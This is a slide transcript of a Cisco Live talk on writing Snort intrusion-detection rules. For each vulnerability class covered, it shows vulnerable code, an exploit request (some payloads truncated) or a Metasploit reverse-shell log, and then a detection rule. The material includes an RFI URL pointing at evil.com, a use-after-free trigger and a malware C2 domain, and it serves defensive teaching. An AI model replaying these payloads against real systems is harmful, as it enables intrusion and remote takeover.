SlideShare ist ein Scribd-Unternehmen logo

Introduction to Snort Rule Writing

‱
‱
Cisco DevNet
Cisco DevNet

A session in the DevNet Zone at Cisco Live, Berlin.

Technologie
1 von 83
Downloaden Sie, um offline zu lesen
Introduction to Snort Rule Writing
Snort Rule Syntax # rule header alert tcp any any -> 192.168.1.0/24 111 ( rule action protocol src address src port dst address dst port
Snort Rule Syntax # rule option format alert tcp any any -> 192.168.1.0/24 111 ( msg:"Rule Message"; rule option rule option argument
rule option: content # content match example alert tcp any any -> 192.168.1.0/24 111 ( content:"ABCD"; # is equivalent to: content:"|41 42 43 44|"; The content match finds a static pattern in network data.
content modifiers: nocase # content match modifiers: nocase alert tcp any any -> 192.168.1.0/24 111 ( # match "ABCD" or "abcd" etc. content:"ABCD"; nocase; nocase makes a content match case insensitive. content matches are case sensitive by default.
content modifiers: offset # content match modifiers: offset alert tcp any any -> 192.168.1.0/24 111 ( # skip 2 bytes before searching for "ABCD" content:"ABCD"; offset:2; offset requires the match to occur after the designated offset in network data.
content modifiers: depth # content match modifiers: depth alert tcp any any -> 192.168.1.0/24 111 ( # match "ABCD" within the first 4 bytes of the payload content:"ABCD"; depth:4; depth restricts how far Snort should search for the specified pattern.
content modifiers: distance # content match modifiers: distance alert tcp any any -> 192.168.1.0/24 111 ( # find "DEF" 1 byte after "ABC" content:"ABC"; content:"DEF"; distance:1; distance specifies how far into a payload Snort should ignore before starting to search for the specified pattern relative to the end of the previous pattern match.
content modifiers: within # content match modifiers: within alert tcp any any -> 192.168.1.0/24 111 ( # find "EFG" within 10 bytes of "ABC" content:"ABC"; content:"EFG"; within:10; within makes sure that at most N bytes are between pattern matches.
negated content match # negated content match alert tcp any any -> 192.168.1.0/24 111 ( # make sure "EFG" is NOT within 10 bytes of "ABC" content:"ABC"; content:!"EFG"; within:10; content matches can be negated.
content buffers # content buffer example alert tcp any any -> 192.168.1.0/24 111 ( # match "ABC" within the HTTP URI content:"ABC"; http_uri; content matches can be restricted to a payload location, such as the HTTP URI.
content buffers POST /index.php HTTP/1.1 Host: example.com Content-Length: 28 Content-Type: application/x-www-form-urlencoded Cookie: this_is_a_cookie=this_is_its_value firstparam=one&secondparam=two Buffers: http_method http_uri http_header http_cookie http_client_body
content modifiers: fast_pattern # fast_pattern example alert tcp any any -> 192.168.1.0/24 111 ( # set "ABC" as the rule fast_pattern content:"ABC"; fast_pattern; fast_pattern explicitly specifies the content match within a rule to be used with the fast pattern matcher. The fast_pattern serves as the “entrance” condition for rule evaluation.
content modifiers: fast_pattern # fast_pattern:only; example alert tcp any any -> 192.168.1.0/24 111 ( # set "ABC" as the rule fast_pattern content:"ABC"; fast_pattern:only; fast_pattern:only; selects the content match to be used in the fast pattern matcher for the rule and also specifies that this match will not be evaluated again when the rule “enters”.
rule option: pcre # pcre rule option example alert tcp any any -> 192.168.1.0/24 111 ( # match the following regex pcre:"/A[BC]D/i"; pcre declares a Perl compatible regular expression for matching on payload data. Flags can be specified after the slash. e.g. /i for case insensitivity.
Traffic Triage and Isolation Normal Trafficfast_pattern content, etc. Vulnerable Application Traffic Slow Fast pcre content, etc. Vulnerable Parameter Traffic Vulnerability Condition Vulnerability Condition Traffic VolumeSpeed Traffic Type
Detection Strategies
Detection Topics > Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
Buffer Overflow Overview Stack buffer overflow in AVM Fritz!Box daemon dsl_control. AVM Fritz!Box firmware fails to check the length of user supplied data in a 'se' or ScriptExecute command sent in a SOAP request to the dsl_control daemon.
Buffer Overflow Overview dsl_cpi_cli_access.c registers the command 'se' to the DSL_CPE_CLI_ScriptExecute handler function: [...] DSL_CPE_CLI_CMD_ADD_COMM ( "se", "ScriptExecute", DSL_CPE_CLI_ScriptExecute, g_sSe); [...]
Buffer Overflow Overview DSL_CLI_LOCAL DSL_int_t DSL_CPE_CLI_ScriptExecute([...]) { [...] DSL_char_t sFileName[DSL_MAX_COMMAND_LINE_LENGTH] = {0}; if(DSL_CPE_CLI_CheckParamNumber(pCommands,1, DSL_CLI_EQUALS) == DSL_FALSE) { return -1; } DSL_CPE_sscanf(pCommands, "%s", sFileName); [...]
Buffer Overflow Overview The code calls the function DSL_CPE_sscanf in order to copy the value of the parameter pCommands to the local character array sFileName without restricton or bounds checking. The size of the vulnerable stack buffer is 256 bytes as indicated in dsl_cpi_cli_console.h: #define DSL_MAX_COMMAND_LINE_LENGTH 256 Triggering the vulnerability is then a simple matter of sending >256 bytes in the first 'se' parameter.
Buffer Overflow Exploit <?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV= "http://schemas.xmlsoap.org/soap/envelope/"; xmlns:ifx="urn:dsl_api"> <SOAP-ENV:Body> <ifx:DslCpeCliAccess> <command>se "A"*300</command> </ifx:DslCpeCliAccess> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
Buffer Overflow Detection # vulnerable SOAP request # with at least 256 bytes # within <command></command> # content:"DslCpeCliAccess"; fast_pattern:only; http_client_body; content:"<command"; nocase; http_client_body; isdataat:256,relative; content:!"</command"; nocase; within:256; http_client_body; # stack buffer overflow (>256 bytes) # within param0: <command> se param0 </command> # pcre:"/<command[^>]*?>s*ses[^<]{256}/Pi";
Buffer Overflow Detection alert tcp $EXTERNAL_NET any -> $HOME_NET 8080 ( msg:"SERVER-WEBAPP AVM FritzBox dsl_control stack buffer overflow attempt"; flow:to_server,established; content:"DslCpeCliAccess"; fast_pattern:only; http_client_body; content:"<command"; nocase; http_client_body; isdataat:256,relative; content:!"</command"; within:256; nocase; http_client_body; pcre:"/<command[^>]*?>s*ses[^<]{256}/Pi"; metadata:policy security-ips drop, service http; classtype:attempted-admin; )
Detection Topics > Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
Detection Topics Buffer Overflow > Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
Command Injection Overview CVE-2014-3805 Command injection vulnerabilities in AlienVault OSSIM av- centerd, which accepts SOAP commands on port 40007. SOAP command 'get_log_line' parameter '$number_lines' and 'get_license' parameter '$license_type' are used in OS commands without sanitization.
Command Injection Overview /usr/share/alienvault-center/lib/AV/CC/Util.pm sub get_log_line() { my ( $function_llamada, $name, $uuid, $admin_ip, $hostname, $r_file, $number_lines ) = @_; [...] # $number_lines used in OS command without sanitization my $command = "tail -$number_lines $r_file"; my @content = `$command`; [...] }
Command Injection Overview /usr/share/alienvault-center/lib/AV/CC/Util.pm sub get_license() { my ( $function_llamada, $name, $uuid, $admin_ip, $hostname, $license, $license_type ) = @_; [...] # $license_type used in OS command without sanitization my $package = system ("curl --proxy-anyauth -K /etc/curlrc http://[...]/avl/$license_type/[...]"); }
Command Injection Exploit POST /av-centerd HTTP/1.1 Host: 172.16.8.223:40007 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Length: 765 Content-Type: text/xml; charset=utf-8 SOAPAction: "AV/CC/Util#get_log_line" <?xml version="1.0" encoding="UTF-8"?><soap:Envelope soap:encodingStyle[...]><soap:Body><get_log_line xmlns="AV/CC/Util"><c-gensym3 xsi:type="xsd:string">All[...]</c-gensym3><c-gensym13 xsi:type="xsd:string">&amp;&amp; perl -MMIME::Base64 -e &apos;system(decode_base64(&quot;cGVy[...]</c- gensym13></get_log_line></soap:Body></soap:Envelope>
Command Injection Exploit POST /av-centerd HTTP/1.1 Host: 172.16.8.223:40007 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Length: 765 Content-Type: text/xml; charset=utf-8 SOAPAction: "AV/CC/Util#get_log_line" <?xml version="1.0" encoding="UTF-8"?><soap:Envelope soap:encodingStyle[...]><soap:Body><get_log_line xmlns="AV/CC/Util"><c-gensym3 xsi:type="xsd:string">All[...]</c-gensym3><c-gensym13 xsi:type="xsd:string">&amp;&amp; perl -MMIME::Base64 -e &apos;system(decode_base64(&quot;cGVy[...]</c- gensym13></get_log_line></soap:Body></soap:Envelope>
Command Injection Exploit msf exploit(alienvault_centerd_soap_exec) > exploit [*] Started reverse handler on 172.16.158.1:4444 [*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.173:41320) at 2014-07-19 12:09:00 -0500 id uid=0(root) gid=0(root) groups=0(root) remember traffic isolation...
Command Injection Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP AlienVault OSSIM get_log_line command injection attempt"; flow:to_server,established; content:"/av-centerd"; nocase; http_uri; content:"<get_log_line"; fast_pattern; nocase; http_client_body; content:"xsd:string"; distance:0; nocase; http_client_body; pcre:"/xsdx3astring[^>]*?>[^<]*?([x3bx7cx26x60]|x24x28)/Pi"; metadata:service http; reference:cve,2014-3805; classtype:attempted-admin; )
Command Injection Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP AlienVault OSSIM get_license command injection attempt"; flow:to_server,established; content:"/av-centerd"; nocase; http_uri; content:"<get_license"; fast_pattern; nocase; http_client_body; content:"xsd:string"; distance:0; nocase; http_client_body; pcre:"/xsdx3astring[^>]*?>[^<]*?([x3bx7cx26x60]|x24x28)/Pi"; metadata:service http; reference:cve,2014-3805; classtype:attempted-admin; )
Command Injection Overview CVE-2014-5073 OS command injection vulnerability in VMTurbo Operations Manager vmtadmin.cgi parameter 'fileDate'. If the 'callType' parameter is set to "DOWN" vmtadmin.cgi will pass the value of 'fileDate' to system().
Command Injection Overview my $actiontype = $query->param("actionType"); my $calltype = $query->param("callType"); my $filedate = $query->param("fileDate"); my $statusfile = (defined $filedate) ? $filedate : $mon.".".$mday." [...] [...] elseif ($calltype eq "DOWN") { [...] system("rm "$upload_dir$statusfile""); [...]
Command Injection Exploit GET /cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP &fileDate=%22%60printf%20%27177105114[...] HTTP/1.1 Host: 172.16.41.140 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: application/x-www-form-urlencoded Content-Length: 0
Command Injection Exploit GET /cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP &fileDate=%22%60printf%20%27177105114[...] HTTP/1.1 Host: 172.16.41.140 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: application/x-www-form-urlencoded Content-Length: 0
Command Injection Exploit msf exploit(vmturbo_vmtadmin_exec_noauth) > exploit [*] Started reverse handler on 172.16.158.1:4444 [*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.173:41320) at 2014-07-19 12:09:00 -0500 id uid=0(root) gid=0(root) groups=0(root)
Command Injection Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP VMTurbo vmtadmin.cgi command injection attempt"; flow:to_server,established; metadata:policy security-ips drop, service http; reference:cve,2014-5073; classtype:attempted-admin; ) content:"callType=DOWN"; nocase; http_uri; content:"fileDate="; nocase; http_uri; pcre:"/[?&]fileDate=[^&]*?([x60x3bx7c]|[x3cx3ex24]x28)/Ui"; Start by isolating traffic. content:"/cgi-bin/vmtadmin.cgi"; fast_pattern:only; http_uri;
Command Injection Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP VMTurbo vmtadmin.cgi command injection attempt"; flow:to_server,established; content:"/cgi-bin/vmtadmin.cgi"; fast_pattern:only; http_uri; content:"callType=DOWN"; nocase; http_uri; content:"fileDate="; nocase; http_raw_uri; content:"%26"; distance:0; http_raw_uri; pcre:"/[?&]fileDate=[^&]*?%26/Ii"; metadata:policy security-ips drop, service http; reference:cve,2014-5073; classtype:attempted-admin; )
Detection Topics Buffer Overflow > Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
Detection Topics Buffer Overflow Command Injection > Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
Directory Traversal Overview CVE-2014-2424 Directory traversal vulnerability in Oracle Event processing. FileUploadServlet function processUploadedFile() fails to properly sanitize the filename parameter value. The WMI service can be abused to convert the file upload into remote code execution without user interaction.
Directory Traversal Overview private void processUploadedFile(FileItem paramFileItem) { try { // paramFileItem.getName() used to // create file without verification paramFileItem.write(new File(this.uploadLocation, paramFileItem.getName())); } catch (Exception localException) { [...] } }
Directory Traversal Exploit POST /wlevs/visualizer/upload HTTP/1.1 Host: 172.16.8.29:9002 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: multipart/form-data; boundary=_Part_732_2993821416_1334322828 Content-Length: 2658 --_Part_732_2993821416_1334322828 Content-Disposition: form-data; name="uploadfile"; filename="../../../../../../../WINDOWS/system32/wbem/mof/klIvousnq.mof" Content-Type: application/octet-stream Content-Transfer-Encoding: binary #pragma namespace(".rootcimv2") [...]
Directory Traversal Exploit POST /wlevs/visualizer/upload HTTP/1.1 Host: 172.16.8.29:9002 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: multipart/form-data; boundary=_Part_732_2993821416_1334322828 Content-Length: 2658 --_Part_732_2993821416_1334322828 Content-Disposition: form-data; name="uploadfile"; filename="../../../../../../../WINDOWS/system32/wbem/mof/klIvousnq.mof" Content-Type: application/octet-stream Content-Transfer-Encoding: binary #pragma namespace(".rootcimv2") [...]
Directory Traversal Exploit msf exploit(oracle_event_processing_upload) > rexploit [*] Reloading module... [*] Started reverse handler on 172.16.158.1:4444 [*] 172.16.158.198:9002 - Generating payload and mof file... [*] 172.16.158.198:9002 - Uploading the exe payload hENIwUPM.exe... [*] 172.16.158.198:9002 - Uploading the MOF file klIvousnq.mof [*] Sending stage (769536 bytes) to 172.16.158.198 [*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.198:1052) at 2014-06-29 15:42:37 -0500 [+] Deleted wbem/mof/klIvousnq.mof [!] This exploit may require manual cleanup of 'hENIwUPM.exe' on the target meterpreter > getuid Server username: NT AUTHORITYSYSTEM
Directory Traversal Detection # # Multipart POST # content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; content:"filename"; nocase; http_client_body; content:"Content-Disposition"; nocase; http_client_body; pcre:"/filenames*=s*[^rn]*?(x2e|%2e){2}([x2fx5c]|%2f|%5c)/Pi"; # # Urlencoded POST # content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; content:"filename="; nocase; http_client_body; pcre:"/(^|&)filename=[^&]*?(x2e|%2e){2}([x2fx5c]|%2f|%5c)/Pim";
Directory Traversal Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP Oracle Event Processing directory traversal attempt"; flow:to_server,established; content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; content:"filename"; nocase; http_client_body; content:"Content-Disposition"; nocase; http_client_body; pcre:"/filenames*=s*[^rn]*?(x2e|%2e){2}([x2fx5c]|%2f|%5c)/Pi"; metadata:policy balanced-ips drop, policy security-ips drop, service http; reference:cve,2014-2424; classtype:attempted-admin; )
Directory Traversal Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP Oracle Event Processing directory traversal attempt"; flow:to_server,established; content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; content:"filename="; nocase; http_client_body; pcre:"/(^|&)filename=[^&]*?(x2e|%2e){2}([x2fx5c]|%2f|%5c)/Pim"; metadata:policy balanced-ips drop, policy security-ips drop, service http; reference:cve,2014-2424; classtype:attempted-admin; )
Detection Topics Buffer Overflow Command Injection > Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
Detection Topics Buffer Overflow Command Injection Directory Traversal > Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
Use-After-Free Overview CVE-2013-3893 This vulnerability is triggered by Javascript that sets an onlosecapture() handler on the parent of two elements. This handler clears the DOM with document.write() when it is called. The Javascript then calls setCapture() on the parent and the child element. This triggers the onlosecapture() handler, freeing a reference with document.write(). After the free, the invalid reference will remain causing a crash (or code execution) in MSHTML!CTreeNode::GetInterface.
Use-After-Free Trigger function trigger() { var id_0 = document.createElement("sup"); var id_1 = document.createElement("audio"); document.body.appendChild(id_0); document.body.appendChild(id_1); id_1.applyElement(id_0); id_0.onlosecapture=function(e) { document.write(""); } id_0.setCapture(); id_1.setCapture(); }
Use-After-Free Trigger 0:005> r eax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34 eip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 MSHTML!CTreeNode::GetInterface+0xd8: 679b6b61 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=????????
Use-After-Free Detection alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any ( msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt"; flow:to_client,established; file_data; content:".applyElement"; nocase; content:".onlosecapture"; nocase; within:500; fast_pattern; content:".setCapture"; nocase; within:500; content:".setCapture"; nocase; within:500; pcre:"/.applyElements*(s*(?P<var>w+)s*).*?(?P=var).onlosecapture.*?(?P=var).setCapture/si"; metadata:service ftp-data, service http, service imap, service pop3; reference:cve,2013-3893; )
Use-After-Free Detection alert tcp $EXTERNAL_NET any -> $SMTP_SERVERS 25 ( msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt"; flow:to_server,established; file_data; content:".applyElement"; nocase; content:".onlosecapture"; nocase; within:500; fast_pattern; content:".setCapture"; nocase; within:500; content:".setCapture"; nocase; within:500; pcre:"/.applyElements*(s*(?P<var>w+)s*).*?(?P=var).onlosecapture.*?(?P=var).setCapture/si"; metadata:service smtp; reference:cve,2013-3893; )
Detection Topics Buffer Overflow Command Injection Directory Traversal > Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free > Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
Remote File Include Overview CVE-2008-5053 Remote file include vulnerability in Joomla Simple RSS Reader allows execution of arbitrary PHP code via the parameter mosConfig_live_site in administrator/components/com_rssreader/admin.rssreader.php: include("$mosConfig_live_site/components/com_rssreader/about.html"); $mosConfig_live_site is obtained from the GET parameter of the same name sent to admin.rssreader.php. Exploit: http://site/joomlapath/administrator/components/com_rssreader /admin.rssreader.php?mosConfig_live_site=http://evil.com/
Remote File Include Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP Joomla admin.rssreader.php remote file include attempt"; flow:to_server,established; content:"admin.rssreader.php"; fast_pattern:only; http_uri; content:"mosConfig_live_site="; nocase; http_uri; pcre:"/[?&]mosConfig_live_site=[^&]*?(http|ftp)/Ui"; metadata:service http; reference:cve,2008-5053; classtype:web-application-attack; )
Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free > Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include > Browser Plugins Cross Site Scripting Malware Command Traffic
Browser Plugin Overview CVE-2012-2516 GE Proficy Historian's KeyHelp.ocx ActiveX control adds HTML Help functionality for the Proficy enterprise data collection system. It can be instantiated in a web page using the <object> tag, for example: <object id="ctrl" classid="clsid:45e66957-2932-432a-a156-31503df0a681"> Or using Javascript: obj = new ActiveXObject("KeyHelp.KeyScript")
Browser Plugin Overview The API of this ActiveX object exposes several methods including LaunchTriPane(), which has the following prototype: Void LaunchTriPane(System.string ChmFile) The function LaunchTriPane will use ShellExecute to launch hh.exe, with user controlled data as parameters: > HH.EXE -decompile D:/destination-folder C:/test.chm This can be abused to write arbitrary files. Code execution is possible by uploading a WMI .mof file.
Browser Plugin Disassembly KeyHelp.ocx: 5D335165 CALL KeyHelp.5D31797F 5D33516A JMP SHORT KeyHelp.5D33517D 5D33516C PUSH 5 5D33516E PUSH EDI 5D33516F PUSH ESI ; Malicious command line parameters - no validation 5D335170 PUSH KeyHelp.5D347950 ; ASCII "hh.exe" 5D335175 PUSH EDI 5D335176 PUSH EDI 5D335177 CALL SHELL32.ShellExecuteA ; run hh.exe with malicious params 5D33517D CMP ESI,EDI 5D33517F JE SHORT KeyHelp.5D335187 5D335181 PUSH ESI
Browser Plugin Exploit <html> <body><script> KeyScript = new ActiveXObject("KeyHelp.KeyScript"); ChmPayloadFile = "-decompile C:WINDOWSsystem32 "+ "172.16.211.11A5vTb1QLAqfifDoixwWS.chm"; ChmMofFile = "-decompile c:WINDOWSsystem32wbemmof "+ "172.16.211.11A5vTb1QLAqfifQLQklKr.chm"; KeyScript.LaunchTriPane(ChmPayloadFile); setTimeout('KeyScript.LaunchTriPane(ChmMofFile);',3000); </script></body> </html>
Browser Plugin Detection # # <OBJECT> Detection # alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"BROWSER-PLUGINS GE Proficy Historian KeyHelp ActiveX clsid access attempt"; flow:to_client,established; file_data; content:"45E66957-2932-432A-A156-31503DF0A681"; fast_pattern:only; content:"LaunchTriPane"; nocase; metadata:policy security-ips drop, service http; reference:cve,2012-2516; classtype:attempted-user; )
Browser Plugin Detection # # Javascript Detection # alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"BROWSER-PLUGINS GE Proficy Historian KeyHelp ActiveX clsid access attempt"; flow:to_client,established; file_data; content:"KeyHelp.KeyScript"; fast_pattern:only; content:"LaunchTriPane"; nocase; metadata:policy security-ips drop, service http; reference:cve,2012-2516; classtype:attempted-user; )
Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include > Browser Plugins Cross Site Scripting Malware Command Traffic
Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins > Cross Site Scripting Malware Command Traffic
Cross Site Scripting (XSS) Overview OSVDB-89893 Cross-Site Scripting vulnerability in Nagios XI's Alert Cloud due to insufficient sanitization of ‘width’ and ‘height’ parameters sent to the URI: /includes/components/alertcloud/index.php Exploit: /nagiosxi/includes/components/alertcloud/index.php?height=4"}}; alert('XSS'); var aa={"A":{"B":"
Cross Site Scripting (XSS) Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP Nagios XI alert cloud cross site scripting attempt"; flow:to_server,established; content:"/includes/components/alertcloud/index.php"; fast_pattern:only; http_uri; pcre:"/[?&](height|width)=[^&]*?([x22x27x3cx3ex28x29]|script|onload|src)/Ui"; metadata:service http; reference:url,osvdb.org/show/osvdb/89893; classtype:web-application-attack; )
Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins > Cross Site Scripting Malware Command Traffic
Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting > Malware Command Traffic
Malware Sample Overview Win.Trojan.Sefnit Upon execution Win.Trojan.Sefnit drops a service to %AppData%Updaterupdater.dll and starts it. When the service updater.dll starts it attempts to read tasks from the configuration file %AppData%Updater/~conf.dat Initially the conf.dat file doesn't exist. The sample obtains the Disk Volume Serial number and appends it to the MachineGUID. This string is then encrypted. The sample uses 16 bytes of the encrypted value and converts it to a 32 character hex string and uses this string as a UUID sent in the initial request to C2: GET /j/20a0b8237d5b084e46bd673e26d948bf/0001 HTTP/1.1 Host: axnlze.net Accept: */* The URI above has the following hardcoded format: hxxp://<c2domain>/j/<uuid>/<version>
Malware Sample Disassembly 10015B27 PUSH 10112E28 ; /Arg1 = UNICODE ;"c2.net/j/<uuid>/<version>" 10015B2C LEA ECX,DWORD PTR SS:[EBP-4C] ; | 10015B2F CALL <_wcslen-copystr> ; updater.10001BA4 10015B34 MOV BYTE PTR SS:[EBP-4],1 10015B38 MOV EDI,10112E14 ; UNICODE "<uuid>" 10015B3D PUSH EDI ; /Arg1 => 10112E14 10015B3E CALL <_wcslen> ; updater.100196E1 ... 10015BBB PUSH ESI ; UNICODE "<version>" 10015BBC LEA ECX,DWORD PTR SS:[EBP-4C] 10015BBF CALL <substr_loc> 10015BC4 MOV DWORD PTR SS:[EBP-1DC],EAX 10015BCA PUSH ESI ; UNICODE "<version>" 10015BCB CALL <_wcslen> 10015BD0 MOV DWORD PTR SS:[EBP-1EC],EAX 10015BD6 MOV EDI,10112E08 ; UNICODE "0001" ... 1005A043 PUSH 0 ; /Arg4 = 00000000 1005A045 PUSH ECX ; |Arg3 = 008DAA60 ASCII ; "/j/20a0b8237d5b084e46bd673e26d948bf/0001" 1005A046 PUSH EBX ; |Arg2 = 1011B340 ASCII "GET" 1005A047 PUSH EDI ; |Arg1 008C9138 = NULL 1005A048 CALL 10058E00 ; updater.10058E00
Malware Command Traffic Detection # # C2 request detection # # hardcoded urilen urilen:40,norm; # hardcoded uri pattern, begins with "/j/" content:"/j/"; depth:3; http_uri; # ends with "/0001" content:"/0001"; distance:32; within:5; http_uri; # no User-Agent in C2 request content:!"User-Agent"; http_header; # final verification of C2 URI pattern pcre:"/^x2fjx2f[a-f0-9]{32}x2f0001$/U";
Malware Command Traffic Detection alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS ( msg:"MALWARE-CNC Win.Trojan.Sefnit variant outbound connection attempt"; flow:to_server,established; urilen:40,norm; content:"/j/"; depth:3; http_uri; content:"/0001"; within:5; distance:32; http_uri; content:!"User-Agent"; http_header; pcre:"/^x2fjx2f[a-f0-9]{32}x2f0001$/U"; metadata:impact_flag red, service http; classtype:trojan-activity; )
Call to Action ‱ Related sessions: ‱ Introduction to Snort Rule Writing ‱ Detection Strategies with Snort [DevNet-1126] ‱ Visit the World of Solutions for ‱ Cisco Campus ‱ Walk in Labs ‱ Technical Solution Clinics ‱ Meet the Engineer - Available immediately after this talk.
Brandon Stultz talosintel.com @talossecurity

Empfohlen

OpenSourceIntelligence-OSINT.pptx
OpenSourceIntelligence-OSINT.pptxOpenSourceIntelligence-OSINT.pptx
OpenSourceIntelligence-OSINT.pptxanonymousanonymous428352
 
Snort
SnortSnort
SnortStickman Hai
 
Offensive OSINT
Offensive OSINTOffensive OSINT
Offensive OSINTChristian Martorella
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 
Web Uygulama GĂŒvenliği Ve GĂŒvenli Kod GeliƟtirme Eğitim Notlarım
Web Uygulama GĂŒvenliği Ve GĂŒvenli Kod GeliƟtirme Eğitim NotlarımWeb Uygulama GĂŒvenliği Ve GĂŒvenli Kod GeliƟtirme Eğitim Notlarım
Web Uygulama GĂŒvenliği Ve GĂŒvenli Kod GeliƟtirme Eğitim NotlarımNur Yesilyurt
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
OSINT - Open Source Intelligence "Leading Intelligence and Investigation Tech...
OSINT - Open Source Intelligence "Leading Intelligence and Investigation Tech...OSINT - Open Source Intelligence "Leading Intelligence and Investigation Tech...
OSINT - Open Source Intelligence "Leading Intelligence and Investigation Tech...Falgun Rathod
 
Network Intrusion Detection System Using Snort
Network Intrusion Detection System Using SnortNetwork Intrusion Detection System Using Snort
Network Intrusion Detection System Using SnortDisha Bedi
 

Empfohlen

OpenSourceIntelligence-OSINT.pptx
OpenSourceIntelligence-OSINT.pptxOpenSourceIntelligence-OSINT.pptx
OpenSourceIntelligence-OSINT.pptxanonymousanonymous428352
 
Snort
SnortSnort
SnortStickman Hai
 
Offensive OSINT
Offensive OSINTOffensive OSINT
Offensive OSINTChristian Martorella
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 
Web Uygulama GĂŒvenliği Ve GĂŒvenli Kod GeliƟtirme Eğitim Notlarım
Web Uygulama GĂŒvenliği Ve GĂŒvenli Kod GeliƟtirme Eğitim NotlarımWeb Uygulama GĂŒvenliği Ve GĂŒvenli Kod GeliƟtirme Eğitim Notlarım
Web Uygulama GĂŒvenliği Ve GĂŒvenli Kod GeliƟtirme Eğitim NotlarımNur Yesilyurt
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
OSINT - Open Source Intelligence "Leading Intelligence and Investigation Tech...
OSINT - Open Source Intelligence "Leading Intelligence and Investigation Tech...OSINT - Open Source Intelligence "Leading Intelligence and Investigation Tech...
OSINT - Open Source Intelligence "Leading Intelligence and Investigation Tech...Falgun Rathod
 
Network Intrusion Detection System Using Snort
Network Intrusion Detection System Using SnortNetwork Intrusion Detection System Using Snort
Network Intrusion Detection System Using SnortDisha Bedi
 
Suricata
SuricataSuricata
Suricatatex_morgan
 
Sızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma SaldırılarıSızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma SaldırılarıBGA Cyber Security
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityMarketingArrowECS_CZ
 
Firewall fundamentals
Firewall fundamentalsFirewall fundamentals
Firewall fundamentalsThang Man
 
What is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityWhat is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityPanda Security
 
